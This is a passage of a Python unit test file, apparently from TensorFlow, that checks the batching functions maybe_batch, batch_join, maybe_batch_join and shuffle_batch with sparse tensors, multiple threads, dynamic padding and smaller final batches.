def _testKeepInputHelper(self, num_threads, enqueue_many,
keep_input_vector=False):
with self.cached_session() as sess:
batch_size = 5
num_batches = 4
examples = variables.Variable(0)
counter = examples.count_up_to(num_batches * batch_size * 2)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.zeros(
[1, 1], dtype=dtypes.int64),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
to_batch = [counter, sparse_counter, "string"]
if enqueue_many:
to_batch = inp.batch(to_batch, 4 if keep_input_vector else 1)
keep_input = array_ops.squeeze(
math_ops.equal(0, math_ops.mod(to_batch[0], 2)))
batched = inp.maybe_batch(
to_batch,
keep_input,
batch_size,
num_threads=num_threads,
enqueue_many=enqueue_many)
variables.initialize_all_variables().run()
variables.initialize_local_variables().run()
threads = queue_runner_impl.start_queue_runners()
for _ in range(num_batches):
results = sess.run(batched)
self.assertAllEqual([0] * batch_size, np.mod(results[0], 2))
self.assertAllEqual([0] * batch_size, np.mod(results[1].values, 2))
self.assertAllEqual([b"string"] * batch_size, results[2])
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSingleThreadKeepInput(self):
self._testKeepInputHelper(1, False)
def testSingleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(1, True)
def testMultipleThreadKeepInput(self):
self._testKeepInputHelper(5, False)
def testMultipleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(5, True)
def testMaybeEnqueuePerExample(self):
self._testKeepInputHelper(1, True, keep_input_vector=True)
def testMultipleThreadMaybeEnqueuePerExample(self):
self._testKeepInputHelper(5, True, keep_input_vector=True)
def testInvalidKeepInputVector(self):
# Can't have vector `keep_input` with `enqueue_many=False`.
with self.assertRaisesRegexp(ValueError, "`keep_input` cannot be a vector"):
inp.maybe_batch([array_ops.zeros(5)],
keep_input=constant_op.constant([True, False]),
batch_size=1,
enqueue_many=False)
# Can't have `keep_input` with more than one dimension.
with self.assertRaisesRegexp(ValueError, "must be 0 or 1 dimensions"):
inp.maybe_batch([array_ops.zeros(5)],
keep_input=constant_op.constant([[True], [False]]),
batch_size=1,
enqueue_many=True)
# `keep_input` must have dimensions determined at graph construction.
with self.assertRaisesRegexp(ValueError,
"must be known at graph construction"):
inp.maybe_batch([array_ops.zeros(5)],
keep_input=array_ops.placeholder(dtypes.bool),
batch_size=1,
enqueue_many=True)
def testMaybeBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch([sparse], keep_input=True, batch_size=2)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch(
[sparse], keep_input=True, batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueManyPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0], [0]], values=[1.0, 2.0], dense_shape=[2])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch(
[sparse], keep_input=[True, False], batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch([sparse], keep_input=True, batch_size=2)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch(
[sparse], keep_input=True, batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch(
[sparse], keep_input=[True, False], batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchCorrectValues(self):
sparse_t = sparse_tensor.SparseTensor(
indices=[[0, 1], [0, 2], [1, 0], [1, 3]],
dense_shape=[2, 4],
values=[5, 4, 7, 2])
keep = constant_op.constant([True, False])
batched = inp.maybe_batch(
[sparse_t], keep_input=keep, batch_size=1, enqueue_many=True)
with self.cached_session():
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(coord=coord)
batched_np = self.evaluate(batched)
coord.request_stop()
for thread in threads:
thread.join()
self.assertAllEqual([[0, 1], [0, 2]], batched_np.indices)
self.assertAllEqual([5, 4], batched_np.values)
self.assertAllEqual([1, 4], batched_np.dense_shape)
class BatchJoinTest(test_lib.TestCase):
def _testTwoThreadsHelper(self, use_dict):
with self.cached_session() as sess:
# Two threads, the first generates (0..69, "a").
num_a = 70
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
# The second generates (99, "b") 90 times and then stops.
num_b = 90
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
sparse_ninety_nine = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(ninety_nine, dtypes.float32)]),
dense_shape=[1])
# These get joined together and grouped into batches of 5.
batch_size = 5
if use_dict:
batched = inp.batch_join(
[{
"c": counter,
"s": sparse_counter,
"S": "a"
}, {
"c": ninety_nine,
"s": sparse_ninety_nine,
"S": "b"
}],
batch_size=batch_size)
batched_fetch = [batched["c"], batched["s"], batched["S"]]
else:
batched = inp.batch_join(
[[counter, sparse_counter, "a"],
[ninety_nine, sparse_ninety_nine, "b"]],
batch_size=batch_size)
batched_fetch = batched
# Shapes.
self.assertEqual(3, len(batched_fetch))
self.assertAllEqual((batch_size,), batched_fetch[0].get_shape().as_list())
self.assertAllEqual((None, 2),
batched_fetch[1].indices.get_shape().as_list())
self.assertAllEqual((None,),
batched_fetch[1].values.get_shape().as_list())
self.assertAllEqual((2,),
batched_fetch[1].dense_shape.get_shape().as_list())
self.assertAllEqual((batch_size,), batched_fetch[2].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched_fetch)
self.assertEqual(3, len(results))
self.assertEqual(batch_size, len(results[0]))
self.assertEqual(batch_size, len(results[2]))
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# We'd like to see some minimum level of mixing of the results of both
# threads, but we can't rely on fair thread scheduling, so we just log.
# self.assertGreater(saw_both, 1)
tf_logging.info("testTwoThreads%s saw both count: %s",
"Dict" if use_dict else "", saw_both)
# Verify the order of results from "a" were preserved.
self.assertAllEqual(all_a, np.arange(num_a))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testTwoThreads(self):
self._testTwoThreadsHelper(use_dict=False)
def testTwoThreadsDict(self):
self._testTwoThreadsHelper(use_dict=True)
def testMismatchedDictKeys(self):
with self.assertRaisesRegexp(ValueError, "must have the same keys"):
inp.batch_join(
[{
"c": 12,
"s": 123,
"S": "a"
}, {
"cool": -12,
"s": 99,
"S": "b"
}],
batch_size=8)
def testTwoThreadsDynamicPad(self):
with self.cached_session() as sess:
# Two threads, the first generates (0..69, ["a"] * 1..70).
num_a = 70
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
# The second generates (99, ["b"] * 99) 90 times and then stops.
num_b = 90
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
# These get joined together and grouped into batches of 5.
batch_size = 5
a = array_ops.tile(["a"],
math_ops.to_int32(array_ops.stack([counter + 1])))
b = array_ops.tile(["b"],
math_ops.to_int32(array_ops.stack([ninety_nine])))
batched = inp.batch_join(
[[counter, a], [ninety_nine, b]],
batch_size=batch_size,
dynamic_pad=True)
# Shapes.
self.assertEqual(2, len(batched))
self.assertAllEqual((batch_size,), batched[0].get_shape().as_list())
self.assertAllEqual((batch_size, None), batched[1].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
count_string_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched)
self.assertEqual(2, len(results))
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[1]), batch_size)
for s in results[1]:
if s[0] == b"b":
self.assertAllEqual(s, [b"b"] * 99)
else:
count_string_a.append(sum(x == b"a" for x in s))
which_a = [i for i, s in enumerate(results[1]) if s[0] == b"a"]
which_b = [i for i, s in enumerate(results[1]) if s[0] == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# We'd like to see some minimum level of mixing of the results of both
# threads, but we can't rely on fair thread scheduling, so we just log.
# self.assertGreater(saw_both, 1)
tf_logging.info("testTwoThreadsDynamicPad saw both count: %s", saw_both)
# Verify the order of results from "a" were preserved.
self.assertAllEqual( # tiled "a" with counter + 1
count_string_a, np.arange(num_a) + 1)
self.assertAllEqual(all_a, np.arange(num_a))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testTwoThreadsSmallerBatch(self):
with self.cached_session() as sess:
extra_elements = 2
# Two threads, the first generates (0..69, "a").
num_a = 70 + extra_elements
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
# The second generates (99, "b") 90 times and then stops.
num_b = 90 + extra_elements
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
sparse_ninety_nine = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(ninety_nine, dtypes.float32)]),
dense_shape=[1])
# These get joined together and grouped into batches of 5.
batch_size = 5
batched = inp.batch_join(
[[counter, sparse_counter, "a"],
[ninety_nine, sparse_ninety_nine, "b"]],
batch_size=batch_size,
allow_smaller_final_batch=True)
# Shapes.
self.assertEqual(3, len(batched))
self.assertAllEqual((None,), batched[0].get_shape().as_list())
self.assertAllEqual((None, 2), batched[1].indices.get_shape().as_list())
self.assertAllEqual((None,), batched[1].values.get_shape().as_list())
self.assertAllEqual((2,), batched[1].dense_shape.get_shape().as_list())
self.assertAllEqual((None,), batched[2].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[2]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# Reached the final batch with 2 * extra_elements.
results = sess.run(batched)
tf_logging.info("Last Batch: %s", results[0])
self.assertEqual(len(results[0]), 2 * extra_elements)
self.assertEqual(len(results[2]), 2 * extra_elements)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].indices,
np.vstack((np.arange(2 * extra_elements),
np.zeros(2 * extra_elements))).T)
self.assertAllEqual(results[1].dense_shape, [2 * extra_elements, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), 2 * extra_elements)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
# We'd like to see some minimum level of mixing of the results of both
# threads, but we can't rely on fair thread scheduling, so we just log.
# self.assertGreater(saw_both, 1)
tf_logging.info("testTwoThreadsSmallerBatch saw both count: %s", saw_both)
# Verify the order of results from "a" were preserved.
self.assertAllEqual(all_a, np.arange(num_a))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testTwoThreadsDynamicPadSmallerBatch(self):
with self.cached_session() as sess:
extra_elements = 2
# Two threads, the first generates (0..69, ["a"] * 1..70).
num_a = 70 + extra_elements
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
# The second generates (99, ["b"] * 99) 90 times and then stops.
num_b = 90 + extra_elements
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
# These get joined together and grouped into batches of 5.
batch_size = 5
a = array_ops.tile(["a"],
math_ops.to_int32(array_ops.stack([counter + 1])))
b = array_ops.tile(["b"],
math_ops.to_int32(array_ops.stack([ninety_nine])))
batched = inp.batch_join(
[[counter, a], [ninety_nine, b]],
batch_size=batch_size,
dynamic_pad=True,
allow_smaller_final_batch=True)
# Shapes.
self.assertEqual(2, len(batched))
self.assertAllEqual((None,), batched[0].get_shape().as_list())
self.assertAllEqual((None, None), batched[1].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
count_string_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[1]), batch_size)
for s in results[1]:
if s[0] == b"b":
self.assertAllEqual(s, [b"b"] * 99)
else:
count_string_a.append(sum(x == b"a" for x in s))
which_a = [i for i, s in enumerate(results[1]) if s[0] == b"a"]
which_b = [i for i, s in enumerate(results[1]) if s[0] == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# Reached the final batch with 2 * extra_elements.
results = sess.run(batched)
tf_logging.info("Last Batch: %s", results[0])
self.assertEqual(len(results[0]), 2 * extra_elements)
self.assertEqual(len(results[1]), 2 * extra_elements)
for s in results[1]:
if s[0] == b"b":
self.assertAllEqual(s, [b"b"] * 99)
else:
count_string_a.append(sum(x == b"a" for x in s))
which_a = [i for i, s in enumerate(results[1]) if s[0] == b"a"]
which_b = [i for i, s in enumerate(results[1]) if s[0] == b"b"]
self.assertEqual(len(which_a) + len(which_b), 2 * extra_elements)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
# We'd like to see some minimum level of mixing of the results of both
# threads, but we can't rely on fair thread scheduling, so we just log.
# self.assertGreater(saw_both, 1)
tf_logging.info("testTwoThreadsDynamicPadSmallerBatch saw both count: %s",
saw_both)
# Verify the order of results from "a" were preserved.
self.assertAllEqual( # tiled "a" with counter + 1
count_string_a, np.arange(num_a) + 1)
self.assertAllEqual(all_a, np.arange(num_a))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
batched = inp.batch_join(
[[counter, "string"]],
batch_size=batch_size,
shared_name="SHARED_NAME_XYZ",
name="Q")
# Shapes.
self.assertEqual(2, len(batched))
self.assertAllEqual((batch_size,), batched[0].get_shape().as_list())
self.assertAllEqual((batch_size,), batched[1].get_shape().as_list())
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
batched[0].op.inputs[0].op.node_def.attr["shared_name"])
def testCannotInferRankError(self):
with self.cached_session():
x = array_ops.placeholder(dtype=dtypes.int64)
with self.assertRaisesRegexp(ValueError, "Cannot infer Tensor's rank"):
inp.batch_join([[x]], batch_size=2)
def testSingleElementDict(self):
x = inp.batch_join([{"c": [12, 12]}], batch_size=8)
self.assertAllEqual((8, 2), x["c"].get_shape().as_list())
def _testKeepInputHelper(self, num_threads, enqueue_many,
keep_input_vector=False):
with self.cached_session() as sess:
batch_size = 5
num_batches = 4
examples = variables.Variable(0)
counter = examples.count_up_to(num_batches * batch_size * 2)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.zeros(
[1, 1], dtype=dtypes.int64),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
to_batch = [counter, sparse_counter, "string"]
if enqueue_many:
to_batch = inp.batch(to_batch, 4 if keep_input_vector else 1)
keep_input = array_ops.squeeze(
math_ops.equal(0, math_ops.mod(to_batch[0], 2)))
batched = inp.maybe_batch_join(
[to_batch] * num_threads,
keep_input,
batch_size,
enqueue_many=enqueue_many)
variables.initialize_all_variables().run()
variables.initialize_local_variables().run()
threads = queue_runner_impl.start_queue_runners()
for _ in range(num_batches):
results = sess.run(batched)
self.assertAllEqual(
[0] * batch_size,
np.mod(results[0], 2),)
self.assertAllEqual(
[0] * batch_size,
np.mod(results[1].values, 2),)
self.assertAllEqual([b"string"] * batch_size, results[2])
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSingleThreadKeepInput(self):
self._testKeepInputHelper(1, False)
def testSingleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(1, True)
def testMultipleThreadKeepInput(self):
self._testKeepInputHelper(5, False)
def testMultipleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(5, True)
def testSingleThreadKeepInputPerExample(self):
self._testKeepInputHelper(1, True, keep_input_vector=True)
def testMultipleThreadKeepInputPerExample(self):
self._testKeepInputHelper(5, True, keep_input_vector=True)
def testInvalidKeepInputVector(self):
# Can't have vector `keep_input` with `enqueue_many=False`.
with self.assertRaisesRegexp(ValueError, "`keep_input` cannot be a vector"):
inp.maybe_batch_join([[array_ops.zeros(5)]],
keep_input=constant_op.constant([True, False]),
batch_size=1,
enqueue_many=False)
# Can't have `keep_input` with more than one dimension.
with self.assertRaisesRegexp(ValueError, "must be 0 or 1 dimensions"):
inp.maybe_batch_join([[array_ops.zeros(5)]],
keep_input=constant_op.constant([[True], [False]]),
batch_size=1,
enqueue_many=True)
# `keep_input` must have dimensions determined at graph construction.
with self.assertRaisesRegexp(ValueError,
"must be known at graph construction"):
inp.maybe_batch_join([[array_ops.zeros(5)]],
keep_input=array_ops.placeholder(dtypes.bool),
batch_size=1,
enqueue_many=True)
def testMaybeBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch_join([[sparse]], keep_input=True, batch_size=2)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch_join(
[[sparse]], keep_input=True, batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueManyPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0], [0]], values=[1.0, 2.0], dense_shape=[2])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch_join(
[[sparse]], keep_input=[True, False], batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch_join([[sparse]], keep_input=True, batch_size=2)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch_join(
[[sparse]], keep_input=True, batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch_join(
[[sparse]], keep_input=[True, False], batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchCorrectValues(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0, 1], [0, 2], [1, 0], [1, 3]],
dense_shape=[2, 4],
values=[5, 4, 7, 2])
keep = constant_op.constant([True, False])
batched = inp.maybe_batch_join(
[[sparse]], keep_input=keep, batch_size=1, enqueue_many=True)
with self.cached_session():
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(coord=coord)
batched_np = self.evaluate(batched)
coord.request_stop()
for thread in threads:
thread.join()
self.assertAllEqual([[0, 1], [0, 2]], batched_np.indices)
self.assertAllEqual([5, 4], batched_np.values)
self.assertAllEqual([1, 4], batched_np.dense_shape)
class ShuffleBatchTest(test_lib.TestCase):
def _testOneThreadHelper(self, use_dict):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
if use_dict:
batched = inp.shuffle_batch(
{
"c": counter,
"s": sparse_counter,
"S": "string"
},
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=141421)
batched_fetch = [batched["c"], batched["s"], batched["S"]]
else:
batched = inp.shuffle_batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=141421)
batched_fetch = batched
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched_fetch)
self.assertEqual(len(results[0]), batch_size)
all_counts.extend(results[0])
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Results scrambled, but include all the expected numbers.
deltas = [
all_counts[i + 1] - all_counts[i] for i in range(len(all_counts) - 1)
]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertItemsEqual(all_counts, range(num_batches * batch_size))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testOneThread(self):
self._testOneThreadHelper(use_dict=False)
def testOneThreadDict(self):
self._testOneThreadHelper(use_dict=True)
def testOneThreadSmallerBatch(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
extra_elements = 5
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
total_elements = num_batches * batch_size + extra_elements
counter = examples.count_up_to(total_elements)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.shuffle_batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=141421,
allow_smaller_final_batch=True)
batched_fetch = batched
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for _ in range(num_batches):
results = sess.run(batched_fetch)
self.assertEqual(len(results[0]), batch_size)
all_counts.extend(results[0])
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the final batch with extra elements.
results = sess.run(batched)
self.assertAllEqual(results[1].dense_shape, [extra_elements, 1])
self.assertAllEqual(results[2], [b"string"] * extra_elements)
all_counts.extend(results[0])
# Results scrambled, but include all the expected numbers.
deltas = [
all_counts[i + 1] - all_counts[i] for i in range(len(all_counts) - 1)
]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertItemsEqual(all_counts, range(total_elements))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testManyThreads(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.shuffle_batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=173205,
num_threads=4)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
all_counts.extend(results[0])
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Results scrambled, but include all the expected numbers.
deltas = [
all_counts[i + 1] - all_counts[i] for i in range(len(all_counts) - 1)
]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertItemsEqual(all_counts, range(num_batches * batch_size))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testManyThreadsSmallerBatch(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
extra_elements = 5
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
total_elements = num_batches * batch_size + extra_elements
counter = examples.count_up_to(total_elements)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.shuffle_batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
